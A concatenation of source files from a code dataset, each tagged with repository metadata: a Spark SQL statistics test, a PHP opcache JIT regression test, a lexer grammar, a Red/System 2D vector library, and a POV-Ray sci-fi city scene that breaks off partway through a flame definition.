DESC EXTENDED t PARTITION (ds='2017-08-01', hr=11);
-- Collect stats for all partitions
ANALYZE TABLE t PARTITION (ds, hr) COMPUTE STATISTICS;
DESC EXTENDED t PARTITION (ds='2017-08-01', hr=10);
DESC EXTENDED t PARTITION (ds='2017-08-01', hr=11);
DESC EXTENDED t PARTITION (ds='2017-09-01', hr=5);
-- DROP TEST TABLES/VIEWS
DROP TABLE t;
| SQL | 4 | OlegPt/spark | sql/core/src/test/resources/sql-tests/inputs/describe-part-after-analyze.sql | [
"Apache-2.0"
] |
--TEST--
JIT ASSIGN: incorrect narrowing to double
--INI--
opcache.enable=1
opcache.enable_cli=1
opcache.file_update_protection=0
opcache.jit_buffer_size=1M
opcache.protect_memory=1
--FILE--
<?php
function test(){
$x = (object)['x'=>0];
for($i=0;$i<10;$i++){
+$a;
$a=$x->x;
$a=7;
}
}
test()
?>
DONE
--EXPECTF--
Warning: Undefined variable $a in %sassign_047.php on line 5
DONE
| PHP | 2 | NathanFreeman/php-src | ext/opcache/tests/jit/assign_047.phpt | [
"PHP-3.01"
] |
/**
* Lexical grammar for lexical grammar.
*
* The grammar is heavily based on the lexical grammar from Jison.
* https://raw.githubusercontent.com/zaach/lex-parser/master/lex.l
*/
{
macros: {
NAME: `[a-zA-Z_][a-zA-Z0-9_-]*`,
BR: `(?:\\r?\\n)`,
},
startConditions: {
indented: 0,
trail: 0,
rules: 0,
code: 1,
start_condition: 1,
options: 1,
conditions: 1,
action: 1,
},
rules: [
[[`*`], `<<EOF>>`, `return 'EOF'`],
[[`action`], `\\/\\*(.|\\n|\\r)*?\\*\\/`, `return 'ACTION_BODY'`],
[[`action`], `\\/\\/.*`, `return 'ACTION_BODY'`],
[[`action`], `\\/[^ /]*?['\"{}'][^ ]*?\\/`, `return 'ACTION_BODY'`], // regexp with braces or quotes (and no spaces)"
[[`action`], `"(\\\\\\\\|\\\\\"|[^\"])*"`, `return 'ACTION_BODY'`],
[[`action`], `'(\\\\\\\\|\\\\'|[^'])*'`, `return 'ACTION_BODY'`],
[[`action`], `[/"'][^{}/"']+`, `return 'ACTION_BODY'`],
[[`action`], `[^{}/"']+`, `return 'ACTION_BODY'`],
[[`action`], `\\{`, `yy.depth++; return '{'`],
[[`action`], `\\}`, `yy.depth == 0 ? this.begin('trail') : yy.depth--; return '}'`],
[[`conditions`], `{NAME}`, `return 'NAME'`],
[[`conditions`], `>`, `this.popState(); return '>'`],
[[`conditions`], `,`, `return ','`],
[[`conditions`], `\\*`, `return '*'`],
[[`rules`], `{BR}+`, `/* */`],
[[`rules`], `\\s+{BR}+`, `/* */`],
[[`rules`], `\\s+`, `this.begin('indented')`],
[[`rules`], `%%`, `this.begin('code'); return '%%'`],
[[`rules`], `[a-zA-Z0-9_]+`, `return 'CHARACTER_LIT'`],
[[`options`], `{NAME}`, `yy.options[yytext] = true`],
[[`options`], `{BR}+`, `this.begin('INITIAL')`],
[[`options`], `\\s+{BR}+`, `this.begin('INITIAL')`],
[[`options`], `\\s+`, `/* empty */`],
[[`start_condition`], `{NAME}`, `return 'START_COND'`],
[[`start_condition`], `{BR}+`, `this.begin('INITIAL')`],
[[`start_condition`], `\\s+{BR}+`, `this.begin('INITIAL')`],
[[`start_condition`], `\\s+`, `/* empty */`],
[[`trail`], `.*{BR}+`, `this.begin('rules')`],
[[`indented`], `\\{`, `yy.depth = 0; this.begin('action'); return '{'`],
[[`indented`], `%\\{(.|{BR})*?%\\}`, `this.begin('trail'); yytext = yytext.slice(2, -2); return 'ACTION'`],
[`%\\{(.|{BR})*?%\\}`, `yytext = yytext.slice(2, -2); return 'ACTION'`],
[[`indented`], `.+`, `this.begin('rules'); return 'ACTION'`],
[[`indented`], `.+`, `this.begin('rules'); return 'ACTION'`],
[`\\/\\*(.|\\n|\\r)*?\\*\\/`, `/* ignore */`],
[`\\/\\/.*`, `/* ignore */`],
[`{BR}+`, `/* */`],
[`\\s+`, `/* */`],
[`{NAME}`, `return 'NAME'`],
[`"(\\\\\\\\|\\\\\"|[^"])*"`, `yytext = yytext.replace(/\\\\"/g, '"'); return 'STRING_LIT'`],
[`'(\\\\\\\\|\\\\'|[^'])*'`, `yytext = yytext.replace(/\\\\'/g, "'"); return 'STRING_LIT'`],
[`\\|`, `return '|'`],
[`\\[(\\\\\\\\|\\\\\\]|[^\\]])*\\]`, `return 'ANY_GROUP_REGEX'`],
[`\\(\\?:`, `return 'SPECIAL_GROUP'`],
[`\\(\\?=`, `return 'SPECIAL_GROUP'`],
[`\\(\\?!`, `return 'SPECIAL_GROUP'`],
[`\\(`, `return '('`],
[`\\)`, `return ')'`],
[`\\+`, `return '+'`],
[`\\*`, `return '*'`],
[`\\?`, `return '?'`],
[`\\^`, `return '^'`],
[`,`, `return ','`],
[`<`, `this.begin('conditions'); return '<'`],
[`\\/!`, `return '/!'`],
[`\\/`, `return '/'`],
[`\\\\([0-7]{1,3}|[rfntvsSbBwWdD\\\\*+()$\\{\\}|[\\]\\/.^?]|c[A-Z]|x[0-9A-F]{2}|u[a-fA-F0-9]{4})`,
`return 'ESCAPE_CHAR'`],
[`\\\\.`, `yytext = yytext.replace(/^\\\\/g,''); return 'ESCAPE_CHAR'`],
[`\\$`, `return '$'`],
[`\\.`, `return '.'`],
[`%options\\b`, `yy.options = {}; this.begin('options')`],
[`%s\\b`, `this.begin('start_condition'); return 'START_INC'`],
[`%x\\b`, `this.begin('start_condition'); return 'START_EXC'`],
[`%%`, `this.begin('rules'); return '%%'`],
[`\\{\\d+(,\\s?\\d+|,)?\\}`, `return 'RANGE_REGEX'`],
[`\\{{NAME}\\}`, `return 'NAME_BRACE'`],
[`\\{`, `return '{'`],
[`\\}`, `return '}'`],
[`.`, `/* ignore bad characters */`],
[[`code`], `(.|{BR})+`, `return 'CODE'`],
],
} | Lex | 4 | ruby-on-rust/syntax | src/generated/lex.lex | [
"MIT"
] |
Red/System [
Title: "2d vector"
Author: "bitbegin"
File: %vector2d.reds
Note: "2d vector lib for image"
Tabs: 4
Rights: "Copyright (C) 2020 Red Foundation. All rights reserved."
License: {
Distributed under the Boost Software License, Version 1.0.
See https://github.com/red/red/blob/master/BSL-License.txt
}
]
VECTOR2D!: alias struct! [
x [float!]
y [float!]
]
vector2d: context [
magnitude: func [vect [VECTOR2D!] return: [float!]][
sqrt vect/x * vect/x + (vect/y * vect/y)
]
unit: func [vect [VECTOR2D!] /local mag [float!]][
mag: magnitude vect
vect/x: vect/x / mag
vect/y: vect/y / mag
]
from-point: func [
vect [VECTOR2D!]
px [float32!]
py [float32!]
][
vect/x: as float! px
vect/y: as float! py
]
from-points: func [
vect [VECTOR2D!]
p1x [float32!]
p1y [float32!]
p2x [float32!]
p2y [float32!]
][
vect/x: as float! p2x - p1x
vect/y: as float! p2y - p1y
]
;-- A * B =|A|.|B|.sin(angle AOB)
cross-product: func [v1 [VECTOR2D!] v2 [VECTOR2D!] return: [float!]][
v1/x * v2/y - (v1/y * v2/x)
]
;-- A. B=|A|.|B|.cos(angle AOB)
dot-product: func [v1 [VECTOR2D!] v2 [VECTOR2D!] return: [float!]][
v1/x * v2/x + (v1/y * v2/y)
]
clockwise?: func [
p1x [float32!]
p1y [float32!]
p2x [float32!]
p2y [float32!]
p3x [float32!]
p3y [float32!]
return: [logic!]
/local
v21 [VECTOR2D! value]
v23 [VECTOR2D! value]
][
from-points v21 p2x p2y p1x p1y
from-points v23 p2x p2y p3x p3y
0.0 > cross-product v21 v23 ;-- sin(angle pt1 pt2 pt3) > 0, 0<angle pt1 pt2 pt3 <180
]
ccw?: func [
p1x [float32!]
p1y [float32!]
p2x [float32!]
p2y [float32!]
p3x [float32!]
p3y [float32!]
return: [logic!]
/local
v21 [VECTOR2D! value]
v23 [VECTOR2D! value]
][
from-points v21 p2x p2y p1x p1y
from-points v23 p2x p2y p3x p3y
0.0 < cross-product v21 v23 ;-- sin(angle pt2 pt1 pt3) < 0, 180<angle pt2 pt1 pt3 <360
]
distance: func [
px [float32!]
py [float32!]
p1x [float32!]
p1y [float32!]
p2x [float32!]
p2y [float32!]
return: [float!]
/local
v1 [VECTOR2D! value]
v2 [VECTOR2D! value]
ret [float!]
][
from-points v1 p1x p1y p2x p2y
from-points v2 p1x p1y px py
unit v1
ret: cross-product v2 v1
if ret < 0.0 [ret: 0.0 - ret]
ret
]
rotate: func [
vect [VECTOR2D!]
degree [integer!]
/local
rad [float!]
si [float!]
co [float!]
nx [float!]
ny [float!]
][
rad: (as float! degree) * 3.14159265359 / 180.0
si: sin rad
co: cos rad
nx: vect/x * co - (vect/y * si)
ny: vect/x * si - (vect/y * co)
vect/x: nx
vect/y: ny
]
] | Red | 5 | GalenIvanov/red | runtime/datatypes/vector2d.reds | [
"BSL-1.0",
"BSD-3-Clause"
] |
//-----------------------------------------
// Demo scene for some sci-fi props
// including buildings and flying vehicles
// -----------------------------------------
// Made for Persistence of vision 3.6
//==========================================
// Copyright 2004 Gilles Tran http://www.oyonale.com
// -----------------------------------------
// This work is licensed under the Creative Commons Attribution License.
// To view a copy of this license, visit http://creativecommons.org/licenses/by/2.0/
// or send a letter to Creative Commons, 559 Nathan Abbott Way, Stanford, California 94305, USA.
// You are free:
// - to copy, distribute, display, and perform the work
// - to make derivative works
// - to make commercial use of the work
// Under the following conditions:
// - Attribution. You must give the original author credit.
// - For any reuse or distribution, you must make clear to others the license terms of this work.
// - Any of these conditions can be waived if you get permission from the copyright holder.
// Your fair use and other rights are in no way affected by the above.
//==========================================
// This picture can be rendered in one or two passes
// For the 2-pass method, render first without the reflections (Ref=0),
// without saving the file and without aa
// and save the radiosity data (SaveRadOK=1, LoadRadOK=0)
// You can also use a lower size (1/2 for instance)
// When the first pass is completed, render again, now with reflections (Ref=1),
// with aa, with file output and at final size
// and of course load the radiosity data (SaveRadOK=0, LoadRadOK=1)
// The 2-pass method should save some render time and RAM use.
//-----------------------------------------
#include "colors.inc"
#include "textures.inc"
#include "metals.inc"
#include "functions.inc"
#default{finish{ambient 0}}
// -----------------------------------------
// switches
// -----------------------------------------
// In the switch settings below, "0" is used to turn off a feature
#declare RadOK=2; // 0 no rad / 1 test rad / 2 final rad
#declare MediaOK=1; // media
#declare Ref=1; // reflection coefficient : 0 = no reflection in the scene
#declare SaveRadOK=0; // save radiosity data for pass 1
#declare LoadRadOK=0; // load radiosity data for pass 2
#declare BuildingsOK=1; // turn on/off all buildings
#declare Building3OK=1; // turn on/off an individual building if BuildingsOK = 1
#declare Building4OK=1;
#declare Building5OK=1;
#declare Building6OK=1;
#declare Building7OK=1;
#declare CarsOK=1; // turn on/off all cars
#declare Car1OK=1; // turn on/off an individual car if CarsOK = 1
#declare Car4OK=1;
#declare Car5OK=1;
#declare Car6OK=1;
#declare Car7OK=1;
#declare Truck1OK=1;
#declare Truck2OK=1;
#declare BusOK=1; // bus (needs to be turned on/off separately)
// -----------------------------------------
// settings
// -----------------------------------------
// The picture can be rendered in one pass or two passes
// In the 2-pass method, one renders first (SaveRadOK=1) the image without reflections (Ref=0) and without media (MediaOK=1)
// possibly at a lower resolution (1/2 for instance) with no antialiasing
// The second pass (LoadRadOK=1) reuses the radiosity file created by the first one and must be rendered with reflections (Ref=1)
// media (MediaOK=1), at final size with antialiasing
global_settings {
assumed_gamma 1 // tweak if the image is too pale
max_trace_level 20
#if (RadOK>0)
radiosity {
#if (RadOK=2)
count 400 error_bound 0.15
#else
count 35 error_bound 1.8
#end
recursion_limit 1
low_error_factor .5
gray_threshold 0
minimum_reuse 0.015
brightness 1
adc_bailout 0.01/2
normal on
media off
#if (SaveRadOK=1)
save_file "scifi.rad"
#else
#if (LoadRadOK=1)
pretrace_start 1
pretrace_end 1
load_file "scifi.rad"
always_sample off
#end
#end
}
#end
}
// -----------------------------------------
// camera
// -----------------------------------------
#declare cam_location=<400,-100,-300>;
camera {
location cam_location
direction z*1
right x*image_width/image_height
look_at <0,0,0>
translate y*300
}
// -----------------------------------------
// textures and colors
// -----------------------------------------
#declare T_Clear=texture{pigment{Clear}finish{ambient 0 diffuse 0}}
#declare C_Sun=rgb <248,226,192>/255;
#declare C_Sky=rgb <90,131,255>/255;
#declare C_Sky1=rgb <231,234,243>/255;
#declare C_Sky2=rgb <47,101,255>/255;
#declare C_Sky3=(C_Sky*3+C_Sky1)/4;
#declare C_BusLight=rgb <193,198,174>/255;
// -----------------------------------------
// car colors
// -----------------------------------------
#declare Whites=array[3]; // 4% of car colours according to my observations !
#declare LightGreys=array[9];// 36%
#declare DarkGreys=array[9];// 36%
#declare Blues=array[7]; // 17%
#declare Reds=array[6]; // 5%
#declare Greens=array[4]; // 5%
#declare Noir = rgb 0; // 19%
#declare Yellow = rgb <200,150,28>/255;
#declare Whites[0]=rgb <250,250,250>/255;
#declare Whites[1]=rgb <242,225,208>/255;
#declare Whites[2]=rgb <214,213,148>/255;
#declare DarkGreys[0]=rgb <53,53,53>/255;
#declare DarkGreys[1]=rgb <71,63,53>/255;
#declare DarkGreys[2]=rgb <74,73,63>/255;
#declare DarkGreys[3]=rgb <87,86,79>/255;
#declare DarkGreys[4]=rgb <83,83,83>/255;
#declare DarkGreys[5]=rgb <119,119,119>/255;
#declare DarkGreys[6]=rgb <135,140,124>/255;
#declare DarkGreys[7]=rgb <85,89,99>/255;
#declare DarkGreys[8]=rgb <55,55,55>/255;
#declare LightGreys[0]=rgb <158,148,148>/255;
#declare LightGreys[1]=rgb <212,212,212>/255;
#declare LightGreys[2]=rgb <168,169,156>/255;
#declare LightGreys[3]=rgb <163,178,179>/255;
#declare LightGreys[4]=rgb <243,238,223>/255;
#declare LightGreys[5]=rgb <214,202,190>/255;
#declare LightGreys[6]=rgb <155,137,137>/255;
#declare LightGreys[7]=rgb <182,184,192>/255;
#declare LightGreys[8]=rgb <227,222,195>/255;
#declare Blues[0]=rgb <43,36,46>/255;
#declare Blues[1]=rgb 0.5*<5,74,91>/255;
#declare Blues[2]=rgb 0.4*<86,108,149>/255;
#declare Blues[3]=rgb <37,51,78>/255;
#declare Blues[4]=rgb <61,60,65>/255;
#declare Blues[5]=rgb 0.5*<34,38,82>/255;
#declare Blues[6]=rgb 0.2*<49,51,141>/255;
#declare Reds[0]=rgb 0.4*<113,61,59>/255;
#declare Reds[1]=rgb <43,16,15>/255;
#declare Reds[2]=rgb <67,15,18>/255;
#declare Reds[3]=rgb <62,13,17>/255;
#declare Reds[4]=rgb <97,49,50>/255;
#declare Reds[5]=rgb <120,53,50>/255;
#declare Greens[0]=rgb 0.25*<27,69,57>/255;
#declare Greens[1]=rgb 0.25*<29,71,52>/255;
#declare Greens[2]=rgb 0.5*<24,41,35>/255;
// -----------------------------------------
// sun
// -----------------------------------------
#declare LightPos=vaxis_rotate(vaxis_rotate(-z*10000,x,70),y,60);
light_source {LightPos C_Sun*3.5}
// -----------------------------------------
// sky and haze
// -----------------------------------------
sky_sphere{pigment{gradient y color_map{[0 C_Sky*0.05] [0.4 C_Sky]}} scale 2 translate -y}
#if (MediaOK=1)
box{
<-1000,-1000,-1000>, <1000,700,2000>
texture{pigment{Clear}finish{ambient 0 diffuse 0}}
hollow
interior{
media{
scattering{2,C_Sky*0.00025 extinction 1}
}
}
}
#end
// -----------------------------------------
// Buildings
// -----------------------------------------
// 5 buildings, roughly 400 units high
// note 1 : they are mirrored vertically
// note 2 : they are (badly) uv-mapped
//
#if (BuildingsOK=0)
#declare Building3OK=0;
#declare Building4OK=0;
#declare Building5OK=0;
#declare Building6OK=0;
#declare Building7OK=0;
#end
#declare Diff=1; // general diffusion parameter
#declare T_default=texture{pigment{White*0.9}finish{ambient 0 diffuse 1}}
#declare T_default=texture{pigment{rgb Diff}finish{ambient 0 diffuse 1}}
#declare P_Hull=pigment{image_map{jpeg "shiphull" interpolate 2}}
#declare N_Hull=normal{bump_map{jpeg "shiphull" interpolate 2} bump_size 0.5}
#declare P_Metal01=pigment{image_map{jpeg "rust_01" interpolate 2}}
#declare P_Metal03=pigment{image_map{jpeg "rust_02" interpolate 2}}
#declare P_Concrete03=pigment{image_map{jpeg "concrete_03" interpolate 2}}
#declare P_Concrete04=pigment{image_map{jpeg "concrete_04" interpolate 2}}
#declare P_Concrete05=pigment{image_map{jpeg "concrete_05" interpolate 2}}
// -----------------------------------------
// Building 3
// -----------------------------------------
#declare V_WorldBoundMin = <-1.507240, 0.000000, -1.451370>;
#declare V_WorldBoundMax = <1.451370, 14.329500, 1.503610>;
#declare yB=400;
#if (Building3OK=1)
#debug "building 3\n"
#declare T_Concrete = texture{
pigment{
average
pigment_map{
[4 P_Concrete05 scale 1/10]
[3 P_Metal03 scale 1/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Glass=texture{
pigment{Black}
finish{ambient 0 diffuse 0 reflection Ref*0.9}
}
#declare T_Metal=texture{
T_Chrome_3C finish{ambient 0 reflection Ref*0.3}
}
#include "build03_o.inc"
#declare Build3a=union{
object{ P_cube1_Concrete }
object{ P_cube1_Glass }
object{ P_cube1_Metal }
scale yB/V_WorldBoundMax.y
}
#declare Build3=union{
object{Build3a}
object{Build3a scale <1,-1,1>}
union{
object{Build3a}
object{Build3a scale <1,-1,1>}
translate -y*yB*1.5
}
}
#else
#declare Build3a=box{V_WorldBoundMin,V_WorldBoundMax scale yB/V_WorldBoundMax.y texture{T_default}}
#declare Build3=union{
box{V_WorldBoundMin,V_WorldBoundMax}
box{V_WorldBoundMin,V_WorldBoundMax scale <1,-1,1>}
scale yB/V_WorldBoundMax.y
scale 0.8
texture{T_default}
}
#end
// -----------------------------------------
// Building 4
// -----------------------------------------
#declare V_WorldBoundMin = <-1.750000, 0.000000, -1.570000>;
#declare V_WorldBoundMax = <2.271270, 19.298000, 2.370040>;
#declare yB=400;
#if (Building4OK=1)
#debug "building 4\n"
#declare T_Concrete = texture{
pigment{
average
pigment_map{
[4 P_Concrete03 scale 1/10]
[3 P_Metal01 scale 1/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Glass=texture{
pigment{Black}
finish{ambient 0 diffuse 0 reflection Ref*0.9}
}
#declare T_Metal=texture{
T_Chrome_3C finish{ambient 0 reflection Ref*0.3}
}
#include "build04_o.inc"
#declare Build4a=union{
object{ P_cylinder1_Concrete }
object{ P_cylinder1_Glass }
object{ P_cylinder1_Metal }
scale yB/V_WorldBoundMax.y rotate -y*10
}
#declare Build4=union{
object{Build4a}
object{Build4a scale <1,-1,1>}
union{
object{Build4a}
object{Build4a scale <1,-1,1>}
translate -y*yB*1.5
}
}
#else
#declare Build4=union{
box{V_WorldBoundMin,V_WorldBoundMax}
box{V_WorldBoundMin,V_WorldBoundMax scale <1,-1,1>}
scale yB/V_WorldBoundMax.y
scale 0.8
texture{T_default}
}
#end
// -----------------------------------------
// Building 5
// -----------------------------------------
#declare V_WorldBoundMin = <-2.037450, 0.000000, -1.999650>;
#declare V_WorldBoundMax = <2.005100, 19.204000, 2.024570>;
#declare yB=400;
#declare T_ConcreteB5 = texture{
pigment{
average
pigment_map{
[4 P_Concrete04 scale 1/10]
[3 P_Metal01 scale 4/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.15
}
#if (Building5OK=1)
#debug "building 5\n"
#declare T_Concrete=texture{T_ConcreteB5}
#declare T_Glass=texture{
pigment{Black}finish{reflection Ref}
}
#include "build05_o.inc"
#declare Build5a=union{
object{ P_cube1_Concrete }
object{ P_cube1_Glass }
scale yB/V_WorldBoundMax.y
}
#declare Build5=union{
object{Build5a}
object{Build5a scale <1,-1,1>}
union{
object{Build5a}
object{Build5a scale <1,-1,1>}
translate -y*yB*1.5
}
}
#else
#declare Build5=union{
box{V_WorldBoundMin,V_WorldBoundMax}
box{V_WorldBoundMin,V_WorldBoundMax scale <1,-1,1>}
scale yB/V_WorldBoundMax.y
scale 0.8
texture{T_default}
}
#end
// -----------------------------------------
// Building 6
// -----------------------------------------
#declare V_WorldBoundMin = <-2.163690, 0.000000, -2.163690>;
#declare V_WorldBoundMax = <2.163690, 23.207899, 2.163690>;
#declare yB=400;
#if (Building6OK=1)
#debug "building 6\n"
#declare T_Concrete = texture{
pigment{
average
pigment_map{
[4 P_Concrete03 scale 1/10]
[3 P_Metal01 scale 1/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Concrete2 = texture{
pigment{
average
pigment_map{
[2 checker Black,Orange scale 1/20]
[4 P_Concrete03 scale 1/10]
[3 P_Metal01 scale 1/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Glass=texture{
pigment{Black}
finish{ambient 0 diffuse 0 reflection Ref*0.9}
}
#declare T_Metal=texture{
T_Chrome_3C finish{ambient 0 reflection Ref*0.3}
}
#include "build06_o.inc"
#declare Build6a=union{
object{ P_cube1_Concrete }
object{ P_cube1_Concrete2 }
object{ P_cube1_Glass }
object{ P_cube1_Metal }
scale yB/V_WorldBoundMax.y
}
#declare Build6=union{
object{Build6a}
object{Build6a scale <1,-1,1>}
union{
object{Build6a}
object{Build6a scale <1,-1,1>}
translate -y*yB*1.5
}
}
#else
#declare Build6=union{
box{V_WorldBoundMin,V_WorldBoundMax}
box{V_WorldBoundMin,V_WorldBoundMax scale <1,-1,1>}
scale yB/V_WorldBoundMax.y
scale 0.8
texture{T_default}
}
#end
// -----------------------------------------
// Building 7
// -----------------------------------------
#declare V_WorldBoundMin = <-1.326690, -0.004045, -1.041920>;
#declare V_WorldBoundMax = <1.208000, 6.321690, 1.559110>;
#declare yB=300;
#if (Building7OK=1)
#debug "building 7\n"
#declare T_Concrete = texture{
pigment{
average
pigment_map{
[4 P_Concrete03 scale 1/10]
[3 P_Metal01 scale 1/10]
[1 P_Hull scale 1/15]
}
}
normal{N_Hull scale 1/15}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Concrete2 = texture{
pigment{
average
pigment_map{
[5 checker Black,SkyBlue*0.6 scale 1/100]
[2 P_Concrete03 scale 1/10]
[3 P_Metal01 scale 1/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Concrete3 = texture{
pigment{
average
pigment_map{
[5 checker Red*0.5,ForestGreen*0.5 rotate z*45 scale 1/20]
[2 P_Concrete03 scale 1/10]
[3 P_Metal01 scale 1/10]
[1 P_Hull scale 2/10]
}
}
normal{N_Hull scale 2/10}
finish{ambient 0 diffuse Diff}
scale 0.5
}
#declare T_Glass=texture{
pigment{Black}
finish{ambient 0 diffuse 0 reflection Ref*0.9}
}
#declare T_Metal=texture{
pigment{P_Metal01 scale 1/50}
finish{ambient 0 diffuse 1}
}
#include "build07_o.inc"
#declare Build7a=union{
object{ P_cube1_Concrete }
object{ P_cube1_Concrete2 }
object{ P_cube1_Concrete3 }
object{ P_cube1_Glass }
object{ P_cube1_Metal }
scale yB/V_WorldBoundMax.y
}
#declare Build7=union{
object{Build7a}
object{Build7a scale <1,-1,1>}
union{
object{Build7a}
object{Build7a scale <1,-1,1>}
translate -y*yB*1.5
}
}
#else
#declare Build7=union{
box{V_WorldBoundMin,V_WorldBoundMax}
box{V_WorldBoundMin,V_WorldBoundMax scale <1,-1,1>}
scale yB/V_WorldBoundMax.y
scale 0.8
texture{T_default}
}
#end
#declare rd=seed(2);
// -----------------------------------------
// cars
// -----------------------------------------
// cars and trucks
// Note : only the trucks are (badly) uv-mapped
#debug "Cars\n"
#declare nCars=7;
#declare Cars=array[nCars];
#declare Car=box{-1,1 scale <1.4/2,1.4/2,4/2> texture{pigment{White}}}
#declare i=0;
#while (i<nCars)
#declare Cars[i]=object{Car}
#declare i=i+1;
#end
#if (CarsOK=0)
#declare Car1OK=0;
#declare Car4OK=0;
#declare Car5OK=0;
#declare Car6OK=0;
#declare Car7OK=0;
#declare Truck1OK=0;
#declare Truck2OK=0;
#end
// -----------------------------------------
// car 1 (classic car)
// -----------------------------------------
#if (Car1OK=1)
#declare T_Paint = texture{pigment{Blues[3]}finish{ambient 0 diffuse 0.8 specular 1 roughness 1/1000 reflection {0.2*Ref, 0.8*Ref }}}
#declare T_T_Chrome = texture{T_Chrome_1B finish{ambient 0 reflection 0.25*Ref}}
#declare T_T_Glass = texture{pigment{rgbf <0.6,0.9,0.96,0.7>} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0.1*Ref,0.5*Ref}}}
#declare T_T_Hlight = texture{T_T_Glass}
#declare T_T_Motor = texture{T_Chrome_1C finish{ambient 0 reflection 0.25*Ref}}
#declare T_T_Rlight = texture{pigment{rgbf <1,0,0,0.6>} finish{ambient 0 diffuse 1 reflection Ref*0.2}}
#declare T_default = texture{T_Paint}
#declare T_Hlight2 = texture{T_T_Glass}
#declare V_WorldBoundMin = <-2.331450, -0.177594, -1.023210>;
#declare V_WorldBoundMax = <2.543850, 1.081610, 1.023210>;
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.2,3,0.2>*0.7
rotate z*90
translate <-1.8,0.2324,0>
}
#debug "Car1a\n"
#include "car1d_o.inc"
#declare Cars[0]=union{
object{ P_cube2_Hlight2 }
object{ P_cube2_Paint }
object{ P_cube2_T_Chrome }
object{ P_cube2_T_Glass }
object{ P_cube2_T_Hlight }
object{ P_cube2_T_Motor }
object{ P_cube2_T_Rlight }
object{ P_cube2_default }
object{ Flame }
rotate y*-90
translate y*0.2
scale 1.7
}
#end
// -----------------------------------------
// car 4 (nose car)
// -----------------------------------------
#if (Car4OK=1)
#declare V_WorldBoundMin = <-0.578364, -1.226680, -0.903809>;
#declare V_WorldBoundMax = <0.954183, 0.837164, 3.047830>;
#debug "Car4a\n"
#declare T_Exhaust = texture{pigment{DarkGreys[8]}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0,0.2*Ref}}}
#declare T_Paint = texture{pigment{Reds[2]}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0,0.5*Ref}}}
#declare T_Rlight = texture{pigment{Red*0.2}finish{ambient 0 diffuse 1}}
#declare T_Hlight = texture{pigment{White*0.5}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0.3*Ref,Ref}}}
#declare T_Glass = texture{pigment{rgbf <0.9,0.9,0.96,0.9>} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0.1*Ref,0.5*Ref}}}
#declare T_Chrome = texture{pigment{rgb <1,0.9,0.8>*0.7} finish{ambient 0 diffuse 1 brilliance 5 metallic specular 1 roughness 1/200 reflection{0.1*Ref, 0.5*Ref}}}
#declare Intensity=4;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
media {
emission 2*Intensity
density {
spherical
color_map {
[0 rgb 0]
[1 rgb <1,0.9,0.8>]
}
scale <1,0.4,1>
translate -y*0.1
}
}
media {
emission 1*Intensity
density {
pigment_pattern{
function {min(1,max(0,y))}
turbulence 0.1
lambda 4
}
color_map {
[0.0 rgb <1,.5,.05>]
[0.8 rgb 0]
}
scale 0.4*<1,1,1>
}
}
}
scale <0.2,3,0.2>*0.7
rotate -x*90
}
#declare Flames=union{
object{Flame translate <0.3869,-0.3826,-0.08>}
object{Flame translate <0,-0.3826,-0.08>}
object{Flame translate <0.3869,-0.81,0>}
object{Flame translate <0,-0.81,0>}
translate -z*0.4
}
#include "car4_o.inc"
#declare Cars[2]=union{
object{ P_cube1_Chrome }
object{ P_cube1_Exhaust }
object{ P_cube1_Glass }
object{ P_cube1_Hlight }
object{ P_cube1_Paint }
object{ P_cube1_Rlight }
object{ Flames }
translate y*1.1-z*1
scale 1.6
}
#end
// -----------------------------------------
// car 5 (boat car)
// -----------------------------------------
#if (Car5OK=1)
#declare T_default = texture{pigment{Blues[0]}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0,0.5*Ref}}}
#declare T_Rearlight = texture{pigment{Red*0.2}finish{ambient 0 diffuse 1}}
#declare T_ReactorIn = texture{pigment{bozo color_map{[0 Red*0.2][1 White*0.2]}} finish{ambient 0 diffuse 1}}
#declare T_Mirror = texture{pigment{Black}finish{ambient 0 diffuse 0 roughness 1/30 reflection 1*Ref}}
#declare T_Headlight = texture{pigment{White*0.5}finish{ambient 0 diffuse 1 metallic brilliance 4 specular 0.4 roughness 1/30 reflection{0.3*Ref,Ref}}}
#declare T_Glass = texture{pigment{rgbf <0.9,0.9,0.96,0.9>} finish{ambient 0 diffuse 0.1 specular 1 roughness 1/1000 reflection{0.1*Ref,0.5*Ref}}}
#declare T_Chrome = texture{pigment{rgb <1,0.9,0.8>*0.7} finish{ambient 0 diffuse 1 brilliance 5 metallic specular 1 roughness 1/200 reflection{0.1*Ref, 0.5*Ref}}}
#declare Intensity=3;
#declare Flame= difference{
sphere{0,1}
plane{y,0}
hollow
texture{
pigment{Clear}
finish{ambient 0 diffuse 0}
}
interior {
